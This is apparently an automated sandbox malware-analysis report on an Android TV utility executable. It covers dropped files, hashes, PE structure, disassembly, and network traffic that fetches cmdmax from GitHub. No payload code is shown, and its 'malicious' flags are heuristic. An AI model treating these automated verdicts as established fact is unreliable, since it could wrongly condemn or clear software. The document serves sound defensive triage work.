                      Category:dropped
                      Size (bytes):15
                      Entropy (8bit):3.3735572622751855
                      Encrypted:false
                      SSDEEP:3:bO:bO
                      MD5:3C52638971EAD82B5929D605C1314EE0
                      SHA1:7318148A40FACA203AC402DFF51BBB04E638545C
                      SHA-256:5614459EC05FDF6110FA8CE54C34E859671EEFFBA2B7BB4B1AD6C2C6706855AB
                      SHA-512:46F85F730E3CA9A57F51416C6AB4D03F868F895568EEE8F7943CD249B2F71D2A3E83C34E7132715C983D3EFAA865A9CB599A4278C911130A0A6948A535C0573B
                      Malicious:false
                      Preview:RCHELICOPTERFTW

                      C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat

                      Download File
                      Process:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
                      File Type:DOS batch file, Non-ISO extended-ASCII text, with very long lines (316), with CRLF line terminators
                      Category:dropped
                      Size (bytes):307953
                      Entropy (8bit):5.01261471757683
                      Encrypted:false
                      SSDEEP:1536:tsOVzDYf5qe5UFZjzy/jeGzMp9Y3YY2pdTY4RYnqQOcZ84NY5S9NHFCYHzh6B2up:t7Av1Ty5GRVQb8HhckeysOiY1puwp2z
                      MD5:E0663ED31DCB8219FBB39CB42C522C5F
                      SHA1:3F978EA061FC02AFBA80C475F272FAF40D583EA4
                      SHA-256:B3D5E8A85EA6C3DD9517ED4ED09FF9FDA25A322898473BE2BC60CCF7095C9679
                      SHA-512:7828F08711C32E02C32886CBAE5298BCDD74037005E6EE947C6692F5B5FC4890C442D125DE88263366EDF50A914D8101122E3A6590A919554B00E4C2003550CE
                      Malicious:true
                      Preview:@echo off..set ztmp=C:\Users\user\AppData\Local\Temp\ytmp..set MYFILES=C:\Users\user\AppData\Local\Temp\afolder..set bfcec=tmp4785.exe..set cmdline=..SHIFT /0..@echo off..:: Programado por bernarbernuli..:: Versi.n 3.0..:: 05 de febrero de 2024..::..:: changelog..:: v1.0 (29Dic23) - Versi.n inicial. 3706 lineas..:: v2.0 (05Feb24) - A.adidos nuevos enlaces de consulta. (opc 7.3) // corregido enlace de descarga drivers adb y driver aapt. // Mejorado m.todo de instalaci.n de Projectivy Launcher y FLauncher..:: Ahora siempre descarga la .ltima versi.n disponible de drivers ADB,Universal Android Debloater, scrcpy, SmartTube y Projectivy Launcher..:: a.adido acceso directo de Play Store para que se muestre en tu launcher (opc. 1.9)...:: Arreglado bloqueador de publicidad //A.adida 2. p.gina en opcion 7 (Otras herramientas) // a.adido instalar tiendas alternativas como Aurora Store y Aptoide TV (Opc 7.11)..:: A.adido inst

                      C:\Users\user\Desktop\Android TV Tools - Aux Files\BITC7F8.tmp

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):27136
                      Entropy (8bit):5.805931866786917
                      Encrypted:false
                      SSDEEP:384:8qjyLkmCWzyQFqvf5J0rxzeDhLDooH6wkKmTJrFnO3OgGb+fn:7rSyQYvf5MiDqg6wkKmtlO+gjfn
                      MD5:34348DD557468D401AE4BFAE2E850EEE
                      SHA1:936CCC900EDFEC3EC50CB8F80669091966F33ECC
                      SHA-256:7027C3EAC1C4D4F3724262EBC1FE2443422BCE232F1634C3DE7AEBE9380770E5
                      SHA-512:096A1DBA362575BC2A03E59D441B4986F63521E255EC766EEC76D32E8C91601920F4AFB8C682E4CD75AF71CC41F94BFE46524216912DC77F6794C149463CC9F6
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 2%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......R.................D...4......p........`....@.............................................................................<...............................4....................................................................................text....C.......D.................. ..`.rdata..i....`.......H..............@..@.data...."...p.......J..............@....idata..0............\..............@....reloc..2............b..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe (copy)

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):27136
                      Entropy (8bit):5.805931866786917
                      Encrypted:false
                      SSDEEP:384:8qjyLkmCWzyQFqvf5J0rxzeDhLDooH6wkKmTJrFnO3OgGb+fn:7rSyQYvf5MiDqg6wkKmtlO+gjfn
                      MD5:34348DD557468D401AE4BFAE2E850EEE
                      SHA1:936CCC900EDFEC3EC50CB8F80669091966F33ECC
                      SHA-256:7027C3EAC1C4D4F3724262EBC1FE2443422BCE232F1634C3DE7AEBE9380770E5
                      SHA-512:096A1DBA362575BC2A03E59D441B4986F63521E255EC766EEC76D32E8C91601920F4AFB8C682E4CD75AF71CC41F94BFE46524216912DC77F6794C149463CC9F6
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 2%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......R.................D...4......p........`....@.............................................................................<...............................4....................................................................................text....C.......D.................. ..`.rdata..i....`.......H..............@..@.data...."...p.......J..............@....idata..0............\..............@....reloc..2............b..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                      \Device\Null

                      Download File
                      Process:C:\Windows\SysWOW64\PING.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):310
                      Entropy (8bit):5.014136067561851
                      Encrypted:false
                      SSDEEP:6:Pz3UMFSovmWxHLTIkmsWZLTNcwAFeMmvVOIHJFxMVlmJHaVFtIk3:PbLn5pTlms0DAFSkIrxMVlmJHaVPN
                      MD5:B4F12347F11C6C2673A2486563C22F82
                      SHA1:48A49F1D4840B38B6A0B50A113B4F5B3DA25D771
                      SHA-256:AD7BEE9CEC4FC653971A1449F29529A1A28F8D34F52F4012E91D253E08E49B99
                      SHA-512:D26306101C3B0AD6E5C9871D12F7218894490311EEB43F18848FE6B2EF40D69D388E7DD14A6AC23E2EDC11A16285DE82937EF59694279121CDD3204F014D96B8
                      Malicious:false
                      Preview:..Pinging google.com [142.250.186.46] with 32 bytes of data:..Reply from 142.250.186.46: bytes=32 time=6ms TTL=108....Ping statistics for 142.250.186.46:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 6ms, Maximum = 6ms, Average = 6ms..

                      Static File Info

                      General

                      File type:PE32 executable (console) Intel 80386, for MS Windows
                      Entropy (8bit):6.88297916468759
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Android TV Tools v3_ES.exe
                      File size:389'816 bytes
                      MD5:66773f373de9e1aa11b3f2e6f74967af
                      SHA1:cf366b0155f9ab7a2376191120e91bd241f2da8b
                      SHA256:0010eec766b8e255d945d0c5ed3ca892329892c4a106988159a26f8758b52282
                      SHA512:3f1fe9071a0f41cf09b931db5eca2c3f5d2eb8230b918cb89c33eea346154998c2f515229b184ab720ed3644a894cb8e3a6ffafbc53c05054993ab902adfcd16
                      SSDEEP:6144:SbY3pmGHPQ2khasL86OXEJOttcm4vH+NGytIW4h5U5Ai7gQ9:cY3pmGPK/LgXEJOttZ4P+NGytg5u
                      TLSH:A584175929767710E4C328F0859359954BF8CD1E230F9323EA526263AE3D93BECB5DE0
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ..oN..oN..oN..sB..oN.`pE..oN..s@..oN..p]..oN..oO..oN.`pD..oN.0iH..oN.Rich.oN.................PE..L....d.S...................

                      File Icon

                      Icon Hash:4005646064656980

                      Static PE Info

                      General

                      Entrypoint:0x406444
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:
                      Time Stamp:0x53DD6401 [Sat Aug 2 22:19:45 2014 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:d247a55625cd61e3f91a266bce0cd371

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      push FFFFFFFFh
                      push 0040D120h
                      push 00408A70h
                      mov eax, dword ptr fs:[00000000h]
                      push eax
                      mov dword ptr fs:[00000000h], esp
                      sub esp, 10h
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [ebp-18h], esp
                      call dword ptr [0040D034h]
                      xor edx, edx
                      mov dl, ah
                      mov dword ptr [00415ED8h], edx
                      mov ecx, eax
                      and ecx, 000000FFh
                      mov dword ptr [00415ED4h], ecx
                      shl ecx, 08h
                      add ecx, edx
                      mov dword ptr [00415ED0h], ecx
                      shr eax, 10h
                      mov dword ptr [00415ECCh], eax
                      push 00000000h
                      call 00007FBD90702B5Fh
                      pop ecx
                      test eax, eax
                      jne 00007FBD907006CAh
                      push 0000001Ch
                      call 00007FBD9070075Fh
                      pop ecx
                      and dword ptr [ebp-04h], 00000000h
                      call 00007FBD907017C9h
                      call dword ptr [0040D030h]
                      mov dword ptr [00F0EE84h], eax
                      call 00007FBD90702A07h
                      mov dword ptr [00415F14h], eax
                      call 00007FBD907027B0h
                      call 00007FBD907026F2h
                      call 00007FBD906FFF75h
                      mov eax, dword ptr [00415EE8h]
                      mov dword ptr [00415EECh], eax
                      push eax
                      push dword ptr [00415EE0h]
                      push dword ptr [00415EDCh]
                      call 00007FBD906FB1CDh
                      add esp, 0Ch
                      mov dword ptr [ebp-1Ch], eax
                      push eax
                      call 00007FBD906FFF7Ah
                      mov eax, dword ptr [ebp-14h]
                      mov ecx, dword ptr [eax]
                      mov ecx, dword ptr [ecx]

                      Rich Headers

                      Programming Language:
                      • [C++] VS98 (6.0) build 8168
                      • [ C ] VS98 (6.0) build 8168
                      • [RES] VS98 (6.0) cvtres build 1720

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd5c00x3c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb0f0000x3570.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xd0000x100.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xbff60xc0003d664f3f72f1bfbfc0d2510699e922c8False0.5731404622395834data6.540685415161986IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0xd0000xb600x1000ec6ae981726c690fd83605a870e200cfFalse0.351806640625data4.294764655260049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xe0000xb00e980x200021f132633273eea3866c11b893eb656funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xb0f0000x35700x4000fd19a8f2f19328b9cf5e11b74abe9bb3False0.106689453125data4.288504552239682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xb0f0f00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 0, resolution 3780 x 3780 px/mEnglishUnited States0.10186915887850467
                      RT_GROUP_ICON0xb123180x14dataEnglishUnited States1.3
                      RT_VERSION0xb1232c0x244data0.5103448275862069

                      Imports

                      DLLImport
                      KERNEL32.dllGetTempPathA, GetModuleFileNameA, GetStdHandle, Sleep, SetConsoleCursorInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, GetTickCount, GetConsoleMode, ExitProcess, TerminateProcess, GetCurrentProcess, GetCommandLineA, GetVersion, GetLastError, GetFileAttributesA, HeapFree, CloseHandle, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, WriteFile, ReadFile, GetProcAddress, GetModuleHandleA, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, RtlUnwind, HeapAlloc, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, VirtualAlloc, HeapReAlloc, SetStdHandle, FlushFileBuffers, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, CreateFileA, GetCPInfo, GetACP, GetOEMCP, LoadLibraryA, CompareStringA, CompareStringW, SetEnvironmentVariableA, SetEndOfFile, LCMapStringA, LCMapStringW, WriteConsoleA, ReadConsoleInputA, SetConsoleMode
                      WINMM.dlltimeGetTime

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 25, 2024 20:59:02.351969004 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:02.352062941 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:02.352143049 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:02.354223013 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:02.354259014 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:02.999454975 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:02.999768972 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.002831936 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.002860069 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.003154039 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.030440092 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.070535898 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.420731068 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.425709963 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.425766945 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.425767899 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.425815105 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.426563025 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.426584959 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.426599979 CEST49707443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:03.426606894 CEST44349707140.82.121.4192.168.2.5
                      May 25, 2024 20:59:03.520186901 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:03.520225048 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:03.520299911 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:03.520770073 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:03.520787001 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.019435883 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.019500971 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:04.022344112 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:04.022353888 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.022578955 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.024070978 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:04.066493034 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.206533909 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.206739902 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:04.206780910 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.206795931 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:04.207088947 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.207159042 CEST44349708185.199.108.133192.168.2.5
                      May 25, 2024 20:59:04.207326889 CEST49708443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:04.241625071 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:04.241651058 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:04.241722107 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:04.241868019 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:04.241879940 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:04.902368069 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:04.903548956 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:04.903548956 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:04.903574944 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:04.903583050 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:05.185089111 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:05.190320969 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:05.190443993 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:05.190453053 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:05.190568924 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:05.190625906 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:05.190625906 CEST49709443192.168.2.5140.82.121.4
                      May 25, 2024 20:59:05.190638065 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:05.190645933 CEST44349709140.82.121.4192.168.2.5
                      May 25, 2024 20:59:05.191739082 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.191780090 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.192045927 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.192045927 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.192085028 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.716531038 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.717104912 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.717134953 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.717818975 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.717843056 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.910844088 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.916951895 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.917048931 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.917110920 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.917143106 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.917202950 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.930346966 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.932229996 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.932491064 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.932538033 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.936259985 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.936410904 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.936440945 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.939587116 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.939729929 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.939759016 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.943316936 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.943456888 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.943486929 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:05.989362955 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:05.998282909 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.000787020 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.000935078 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.000965118 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.003981113 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.004120111 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.004148960 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.008516073 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.008611917 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.008635998 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.008671045 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.008761883 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.008893967 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.008893967 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.008893967 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.008893967 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.008943081 CEST44349710185.199.108.133192.168.2.5
                      May 25, 2024 20:59:06.317311049 CEST49710443192.168.2.5185.199.108.133
                      May 25, 2024 20:59:06.317338943 CEST44349710185.199.108.133192.168.2.5

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 25, 2024 20:58:56.328916073 CEST6446753192.168.2.51.1.1.1
                      May 25, 2024 20:58:56.337934017 CEST53644671.1.1.1192.168.2.5
                      May 25, 2024 20:59:02.321845055 CEST6253753192.168.2.51.1.1.1
                      May 25, 2024 20:59:02.350922108 CEST53625371.1.1.1192.168.2.5
                      May 25, 2024 20:59:03.428020954 CEST6000553192.168.2.51.1.1.1
                      May 25, 2024 20:59:03.519340992 CEST53600051.1.1.1192.168.2.5

                      ICMP Packets

                      TimestampSource IPDest IPChecksumCodeType
                      May 25, 2024 20:58:56.347645044 CEST192.168.2.5142.250.186.464d5aEcho
                      May 25, 2024 20:58:56.354079962 CEST142.250.186.46192.168.2.5555aEcho Reply

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      May 25, 2024 20:58:56.328916073 CEST192.168.2.51.1.1.10x4002Standard query (0)google.comA (IP address)IN (0x0001)false
                      May 25, 2024 20:59:02.321845055 CEST192.168.2.51.1.1.10x134eStandard query (0)github.comA (IP address)IN (0x0001)false
                      May 25, 2024 20:59:03.428020954 CEST192.168.2.51.1.1.10xa53bStandard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      May 25, 2024 20:58:56.337934017 CEST1.1.1.1192.168.2.50x4002No error (0)google.com142.250.186.46A (IP address)IN (0x0001)false
                      May 25, 2024 20:59:02.350922108 CEST1.1.1.1192.168.2.50x134eNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                      May 25, 2024 20:59:03.519340992 CEST1.1.1.1192.168.2.50xa53bNo error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                      May 25, 2024 20:59:03.519340992 CEST1.1.1.1192.168.2.50xa53bNo error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                      May 25, 2024 20:59:03.519340992 CEST1.1.1.1192.168.2.50xa53bNo error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                      May 25, 2024 20:59:03.519340992 CEST1.1.1.1192.168.2.50xa53bNo error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • github.com
                      • objects.githubusercontent.com

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549707140.82.121.44436360C:\Windows\System32\svchost.exe
                      TimestampBytes transferredDirectionData
                      2024-05-25 18:59:03 UTC183OUTHEAD /tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: github.com
                      2024-05-25 18:59:03 UTC997INHTTP/1.1 302 Found
                      Server: GitHub.com
                      Date: Sat, 25 May 2024 18:59:03 GMT
                      Content-Type: text/html; charset=utf-8
                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                      Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream
                      Cache-Control: no-cache
                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                      X-Frame-Options: deny
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 0
                      Referrer-Policy: no-referrer-when-downgrade
                      2024-05-25 18:59:03 UTC3020INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549708185.199.108.1334436360C:\Windows\System32\svchost.exe
                      TimestampBytes transferredDirectionData
                      2024-05-25 18:59:04 UTC661OUTHEAD /github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: objects.githubusercontent.com
                      2024-05-25 18:59:04 UTC811INHTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 27136
                      Content-Type: application/octet-stream
                      Content-MD5: NDSN1VdGjUAa5L+uLoUO7g==
                      Last-Modified: Wed, 08 Dec 2021 04:12:16 GMT
                      ETag: "0x8D9BA00EB94CF21"
                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                      x-ms-request-id: e755e90b-201e-0070-6ff3-8758a2000000
                      x-ms-version: 2020-10-02
